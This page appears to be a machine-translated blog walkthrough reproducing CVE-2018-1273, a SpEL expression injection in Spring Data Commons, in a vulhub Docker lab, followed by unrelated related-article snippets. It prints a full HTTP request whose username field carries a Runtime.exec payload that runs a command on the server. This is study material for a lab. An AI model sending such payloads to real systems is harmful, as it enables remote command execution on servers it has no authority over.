One 、 Vulnerability description

 Spring Data Is a simple database access , And support the open source framework of cloud services ,Spring Data Commons yes Spring Data The basic framework shared by all subprojects under .Spring Data Commons stay 2.0.5 And previous versions , There is one SpEL Expression injection vulnerability , Attackers can inject malicious SpEL Expression to execute arbitrary commands .

Two 、 Build a loophole environment

The tools you need to prepare are as follows :

1.docker+vulhub Vulnerability Library 
2.Burpsuite
3. Drone aircraft Ubuntu18.04 virtual machine ( Others can be )

open Ubuntu virtual machine , Yes docker The environment and vulhub The vulnerability library will directly enter the environment , If not, install first docker And download vulhub Vulnerability Library ( There are many online tutorials , I won't go into that )

root@admin666-virtual-machine:~/vulhub-master/spring/CVE-2018-1273#

Carry out orders

root@admin666-virtual-machine:~/vulhub-master/spring/CVE-2018-1273# docker-compose up -d

Wait until the following page appears to prove that it has been built



You can visit http://your-ip:8080, The following page appears to prove that the environment is built successfully !

3、 ... and 、 Exploit

1、 Registered users , Submit packet capture

2、 structure payload, Carry out contract test

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.1.17:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://192.168.1.17:8080
Connection: close
Referer: http://192.168.1.17:8080/users
Upgrade-Insecure-Requests: 1 username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=

When the server returns to the following page , Prove that the attack was successful !

3、 Get into Ubuntu Environment , perform

root@admin666-virtual-machine:~/vulhub-master/spring/CVE-2018-1273# docker-compose exec spring bash

Entry directory , see tmp The directory below appears successfully 2333 file , Command executed successfully !

4、 close docker Environmental Science

docker-compose down

CVE-2018-1273 Spring Data Commons More related articles about the recurrence of remote command execution vulnerabilities

  1. ThinkPHP 5.x Remote command execution vulnerability recurrence

    ThinkPHP 5.x Remote command execution vulnerability recurrence One . Vulnerability description 2018 year 12 month 10 Japan ,ThinkPHP The official security update , It fixed ThinkPHP5 A high-risk flaw in the framework : https://blog.th ...

  2. Apache SSI Remote command execution vulnerability recurrence

    Apache SSI Remote command execution vulnerability recurrence One . Vulnerability description When the target server is turned on SSI And CGI Support , We can upload shtml, utilize <!--#exec cmd=”id” --> Syntax execution command . send ...

  3. D-Link service.cgi Remote command execution vulnerability recurrence

    1.1 summary Youxun group (D-Link), Founded on 1986 year ,1994 year 10 It was listed on the Taiwan Stock Exchange in June , It's the first listed Internet company in Taiwan , Create by oneself D-Link Brand marketing all over the world , Our products are all over the world 100 Several countries . 1 month 17 Japan ,C ...

  4. CVE-2019-0193 Remote command execution - Loophole recurrence

    0x01 Vulnerability profile Apache Solr It's an open source search server .Solr Use Java Language development , Based mainly on HTTP and Apache Lucene Realization . The loophole occurred in Apache Solr Of ...

  5. struts2(s2-052) Remote command execution vulnerability recurrence

    Vulnerability description : 2017 year 9 month 5 Japan ,Apache Struts Issue the latest safety bulletin ,Apache Struts2 Of REST There are high-risk vulnerabilities in plug-ins for remote code execution , The vulnerability by lgtm.com The safety researcher of , The vulnerability number is C ...

  6. [CVE-2017-8464]Microsoft Windows Remote command execution vulnerability recurrence

    Copyright notice : This article is the original article of the blogger , It can't be reproduced without the permission of the blogger Preface Record your own reappearance , Reservations 2017 year 6 month 13 Japan , The official release number of Microsoft is CVE-2017-8464 Vulnerability announcement for , The official introduction Windows The system is parsing fast ...

  7. CVE-2019-0193:Apache Solr Remote command execution vulnerability recurrence

    0x00 Vulnerability background 2019 year 8 month 1 Japan ,Apache Solr It's official CVE-2019-0193 Vulnerability warning , The vulnerability is rated as serious 0x01 scope Apache Solr < 8.2.0 0x0 ...

  8. tomcat Remote command execution vulnerability recurrence

    scope Apache Tomcat 7.0.0 - 7.0.81 Unaffected version Apache Tomcat 8.x Apache Tomcat 9.x Vulnerability analysis stay Tomcat The configuration file in the installation directory ...

  9. ghostscript Remote command execution vulnerability recurrence

    The version of the impact <= 9.23( Full version . The whole platform ) Ubuntu Turn on ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0u ...

  10. FlexPaper 2.3.6 Remote command execution vulnerability attach Exp

    Affects version : Less than FlexPaper 2.3.6 All versions of FlexPaper (https://www.flowpaper.com) It's an open source project , follow GPL agreement , It's very popular on the Internet . It's for web client ...

Random recommendation

  1. XStream xml Parsing framework using notes

    1. xml Can be mapped to a class . Class member variable 2. Tags with child tags map to classes , Notes without child tags are mapped to class member variables 3. Class name . If the class member variable name is inconsistent with the label name, you need to set the alias through annotation or code // Class name @XStre ...

  2. Efficient development Android App Of 10 A suggestion ( turn )

    If you want to Google Play I'm going to be the most unsuccessful case in the world , The best secret is that the interface is extremely slow . Power consumption . Memory consumption . Then you get negative comments from users , In the end, fame stinks . Even if your application is well designed . It's no use being creative . Consumption Electricity or memory usage ...

  3. Compare two characters , Equal output yes, Unequal output no

    DATA SEGMENTSHOW1 DB 'YES$'SHOW2 DB 'NO$'DATA ENDSCODE SEGMENTASSUME CS:CODE,DS:DATABEGIN: MOV AX,DA ...

  4. poj 2155 Matrix ( Two dimensional tree array )

    The question : Here's a matrix for you. It's all 0, And then I give you two instructions , The first one is :C x1,y1,x2,y2 That is, the top left corner is x1,y1, The lower right corner is x2,y2, All the numbers in this matrix are flipped ,0 change 1,1 change 0 The second kind :Q x1 y1, transport ...

  5. 201521123091 《Java Programming 》 The first 3 Weekly learning summary

    Java The third week concludes Homework for the third week . Java The third week concludes 1. Summary of this chapter 2.Java Q&A 1. Code reading 2. What's the use of constructors ? What's the format of writing it ? If a class doesn't write a constructor , Does it have a constructor ...

  6. C# Basic Q & A

    1. The difference between static and non static variables ? 2.const and static readonly difference ? 3.extern What does that mean? ? 4.abstract What does that mean? ? 5.internal What does the modifier do ...

  7. deepin 15.8 Desktop system

    Deep desktop environment is a beautiful and easy-to-use environment independently developed by deep technology . Minimalist desktop environment , Mainly from the desktop . starter . The task bar . Control Center . Window manager, etc , The system is pre installed with WPS Office. Sogou input method . Youdao Dictionary . Netease cloud music and deep features should ...

  8. to jumpserver Dual configuration glusterfs Shared replication volumes

    Why use glusterfs Well . In itself Haproxy+Keepalived Yes jumpserver Load balancing and reverse proxy . But real video is only stored on one node Otherwise, when you play the video, you will not find it by ...

  9. dp HDU - 5074

    According to the meaning of the question #include<cstdio> #include<cstring> #define max(a, b) (a)>(b)?(a):(b) ][], num ...

  10. Pairing projects Pair Project

    Pairing projects Pair Project One person programming , Operate by one person , Check together . Source code https://github.com/dpch16303/test/blob/master/%E5%AE%9E%E8%B7%B ...